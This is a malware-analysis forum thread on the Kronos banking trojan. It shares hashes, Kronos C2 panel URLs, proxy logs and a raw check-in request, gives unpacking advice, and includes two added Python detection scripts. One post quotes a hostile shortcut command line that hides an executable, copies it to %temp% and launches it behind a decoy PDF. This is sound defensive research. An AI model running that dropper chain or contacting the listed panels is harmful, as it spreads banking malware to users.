Kronos

Forum for analysis and discussion about malware.
Intimacygel
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm

Kronos

Post by Intimacygel » Tue Jul 15, 2014 1:49 pm

Hi All,

Was wondering if anyone has heard of or seen samples of the supposed replacement for Zeus, "Kronos".

http://www.csoonline.com/article/245363 ... um=twitter


Thanks!

Sargerras
Posts: 9
Joined: Mon May 13, 2013 12:23 pm

Re: Kronos

Post by Sargerras » Tue Aug 05, 2014 9:30 am

Hi, just showed up on this thread.
http://securityblog.s21sec.com/2014/08/ ... -here.html

Sample of Kronos attached.

MD5: f085395253a40ce8ca077228c2322010
http://www.virustotal.com/file/9806d1b6 ... /analysis/

Kafeine
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm

Re: Kronos

Post by Kafeine » Tue Jan 27, 2015 6:57 pm

A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80

pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Variant of Zbot

Post by pwnslinger » Wed Nov 25, 2015 6:50 pm

Hi,
Using the VB6 packing method, it executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop. It enumerates through all procedure names...
Hint me please.

Sample also attached below:

comak
Posts: 43
Joined: Mon Oct 14, 2013 8:25 am

Re: Variant of Zbot

Post by comak » Thu Nov 26, 2015 11:14 am

This is Kronos,


http://bitcoind.su:80/krpanel/connect.php
http://bulletvpn.su:80/krpanel/connect.php
http://thereturn15.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
http://cyberhosting.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
cheers,
mak
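
The two proxy log lines Kafeine posted and the panel URL list mak posted are enough to write a simple network detection. The following is an added example, not code from the thread or from any tool mentioned in it: it parses the "[**]"-separated log format exactly as it appears in Kafeine's post, matches each record against the hostnames from mak's list and the /krpanel/connect.php check-in path, and only reports the (generic) MSIE 10 User-Agent when another indicator already hit. The first two lines of SAMPLE_LOG are Kafeine's; the third, benign line is constructed for contrast.

```python
"""Flag Kronos panel check-ins in "[**]"-separated HTTP proxy logs.

Added example for this thread, not the forum's or any project's code.
Hostnames, the panel path, the IP and the first two log lines come from
the posts above; the third log line is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# C2 URLs exactly as listed by mak in the thread.
KRONOS_C2_URLS = [
    "http://bitcoind.su:80/krpanel/connect.php",
    "http://bulletvpn.su:80/krpanel/connect.php",
    "http://thereturn15.su:80/krpanel/connect.php",
    "http://skycard.su:80/krpanel/connect.php",
    "http://cyberhosting.su:80/krpanel/connect.php",
]
KRONOS_HOSTS = {urlsplit(u).hostname for u in KRONOS_C2_URLS}
KRONOS_PANEL_PATH = "/krpanel/connect.php"
# User-Agent seen in both captures. It is a generic MSIE 10 string, so it is
# treated as corroboration only, never as a hit on its own.
KRONOS_UA = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0)"

# Lines 1-2: Kafeine's capture. Line 3: constructed benign traffic.
SAMPLE_LOG = """\
01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:16:02.000000 example.org [**] /index.html [**] Mozilla/5.0 (Windows NT 6.1) Firefox/35.0 [**] <no referer> [**] GET [**] HTTP/1.1 [**] 200 [**] 5120 bytes [**] 192.168.[xx]:1036 -> 203.0.113.10:80
"""


@dataclass
class HttpEvent:
    timestamp: str
    host: str
    uri: str
    user_agent: str
    method: str
    status: str
    size: int
    src: str
    dst: str


def parse_line(line: str) -> Optional[HttpEvent]:
    """Parse one '[**]'-separated record; return None for malformed lines."""
    parts = line.rstrip("\n").split(" [**] ")
    if len(parts) != 9:
        return None
    ts_host, uri, ua, _referer, method, _version, status, size, conn = parts
    timestamp, _, host = ts_host.partition(" ")   # "<timestamp> <host>"
    m = re.fullmatch(r"(\d+) bytes", size)
    src, _, dst = conn.partition(" -> ")           # "<src>:<port> -> <dst>:<port>"
    if not host or m is None or not dst:
        return None
    return HttpEvent(timestamp, host.lower(), uri, ua, method, status,
                     int(m.group(1)), src, dst)


def kronos_indicators(ev: HttpEvent) -> List[str]:
    """Return the reasons an event looks like a Kronos panel check-in."""
    reasons: List[str] = []
    if ev.host in KRONOS_HOSTS:
        reasons.append("known Kronos C2 host")
    path = ev.uri.split("?", 1)[0]                 # drop "?a=1" style query
    if ev.method == "POST" and path == KRONOS_PANEL_PATH:
        reasons.append("POST to /krpanel/connect.php")
    if reasons and ev.user_agent == KRONOS_UA:
        reasons.append("same MSIE 10 User-Agent as the captures")
    return reasons


def scan_log(text: str) -> List[Tuple[str, str, str, List[str]]]:
    """Run the indicators over every parseable line; return only the hits."""
    hits = []
    for line in text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        reasons = kronos_indicators(ev)
        if reasons:
            hits.append((ev.timestamp, ev.host, ev.uri, reasons))
    return hits


if __name__ == "__main__":
    for ts, host, uri, reasons in scan_log(SAMPLE_LOG):
        print(f"{ts} {host}{uri}: {', '.join(reasons)}")
```

The hostname set is derived from the URL list, so adding a new panel domain means appending one URL; the path match is done on the URI with the query string removed, which is what catches the second request (/krpanel/connect.php?a=1) as well as the first.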

EP_X0FF
Global Moderator
Posts: 4790
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Variant of Zbot

Post by EP_X0FF » Thu Nov 26, 2015 11:33 am

pwnslinger wrote: Hi,
Using the VB6 packing method, it executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop. It enumerates through all procedure names...
Hint me please.

Sample also attached below:
As with most malware crypters used for ZBot, its "decryption" is based on the moment when RunPE is executed. Set a break on CreateProcess and dump the memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos attached. Posts moved.
Ring0 - the source of inspiration

henices
Posts: 3
Joined: Fri Aug 01, 2014 7:29 am

Re: Kronos

Post by henices » Thu Dec 03, 2015 2:13 am

Kafeine wrote: A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80


POST /krpanel/connect.php HTTP/1.1 
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) 
Host: bitcoind.su 
Content-Length: 74 
Cache-Control: no-cache  

WzW,c`cfgcgzcozccazedzeefdfdb*W
The attachment is the report.

pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Re: Variant of Zbot

Post by pwnslinger » Thu Dec 03, 2015 8:07 pm

EP_X0FF wrote:
pwnslinger wrote: Hi,
Using the VB6 packing method, it executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop. It enumerates through all procedure names...
Hint me please.

Sample also attached below:
As with most malware crypters used for ZBot, its "decryption" is based on the moment when RunPE is executed. Set a break on CreateProcess and dump the memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos attached. Posts moved.
Thanks EP. ;)

After dumping the second stage (explorer.exe) (changed EP with PUSH/RET) using the EBFE method for attaching with OllyDbg.
I don't know why, when I want to set a toggle breakpoint on code, Olly can't and just runs (memory regions are RWC!).
Then I used F4 (run till selection) and a hardware breakpoint.
But when it calls SYSENTER... I can't take control back.

pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Re: Kronos

Post by pwnslinger » Fri Feb 12, 2016 10:27 am

I got another variant of Zbot on my system today.
The .rsrc section is base64 encoded. First I thought of the Ranbyus banking trojan.
Also a shortcut was created for running the malware with this content:

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h %cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq

The export table contains a callback function. I checked it in IDA and I didn't see any useful call.
Where should I start?


Sample attached.
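The shortcut command line quoted in the post above shows several behaviours worth keying on when triaging .lnk files: cmd.exe reached by "..\" traversal from an environment variable, a decoy PDF started beside an .exe, attrib used to unhide and then rehide the executable, and xcopy staging it into %temp% before launching from there. The following is an added example, not code from the thread or from any tool it mentions: it splits the posted command line on cmd's "&" operator and reports those behaviours. The command line is embedded exactly as posted, including the cut-off final "start %temp%\JHQtm\Dq"; the only assumption is that chained commands are separated by " & " with spaces, as they are in that line.

```python
"""Triage a cmd.exe /c command chain taken from a shortcut (.lnk).

Added example for this thread, not code from the forum or any project.
LNK_COMMAND_LINE is the line pwnslinger posted, reproduced as posted
(it is truncated after "start %temp%\\JHQtm\\Dq" in the post).
"""
import re
from dataclasses import dataclass
from typing import List

LNK_COMMAND_LINE = (
    r'%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start '
    r'%cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h '
    r'%cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & '
    r'attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq'
)


@dataclass
class CmdChain:
    launcher: str          # everything before " /c "
    commands: List[str]    # the /c payload split on " & "


def split_command(cmdline: str) -> CmdChain:
    """Separate the launcher from the /c payload and split the payload on
    cmd's '&' sequencing operator (assumed to be written as ' & ')."""
    launcher, sep, payload = cmdline.partition(" /c ")
    if not sep:
        return CmdChain(launcher=cmdline, commands=[])
    # strip() tolerates both a closing quote and the truncated, unclosed one
    payload = payload.strip().strip('"')
    commands = [c.strip() for c in payload.split(" & ") if c.strip()]
    return CmdChain(launcher=launcher, commands=commands)


def triage(cmdline: str) -> List[str]:
    """Return human-readable findings for the behaviours seen in the post."""
    chain = split_command(cmdline)
    launcher = chain.launcher.lower()
    cmds = chain.commands
    findings: List[str] = []

    # %ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe: the traversal hides
    # the real path from naive string matching on "C:\Windows\System32".
    if "\\..\\" in launcher and launcher.endswith("cmd.exe"):
        findings.append("launcher: cmd.exe reached via '..' traversal from an environment variable")

    started = [c.split(None, 1)[1] for c in cmds
               if c.lower().startswith("start ") and len(c.split()) > 1]
    exe_paths = {p.lower() for c in cmds for p in re.findall(r"\S+\.exe", c, re.I)}
    if any(s.lower().endswith(".pdf") for s in started) and exe_paths:
        findings.append("decoy: a PDF is opened in the same chain that handles an .exe")

    for i, c in enumerate(cmds):
        low = c.lower()
        if low.startswith("attrib ") and ".exe" in low:
            flags = " ".join(t for t in low.split() if t[0] in "+-")
            findings.append(f"cmd[{i}]: attrib changes hidden/system flags on an .exe ({flags})")
        if low.startswith("xcopy ") and "%temp%" in low:
            findings.append(f"cmd[{i}]: xcopy stages a file into %temp%")
        if low.startswith("start ") and "%temp%" in low:
            findings.append(f"cmd[{i}]: something is launched from %temp%")
    return findings


if __name__ == "__main__":
    for f in triage(LNK_COMMAND_LINE):
        print(f)
```

Each check is independent, so a benign "cmd.exe /c dir" produces no findings, while the posted line trips all of them; the attrib pair (-s -h before the copy, +s +h after it) is reported per command so the unhide/rehide sequence is visible in the output.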

puzzlex
Posts: 20
Joined: Tue Oct 20, 2015 12:22 pm

Re: Kronos

Post by puzzlex » Fri Feb 12, 2016 1:18 pm

This DqGLtNo.exe is packed multiple times. Here is the final payload: https://www.virustotal.com/en/file/18f8 ... /analysis/
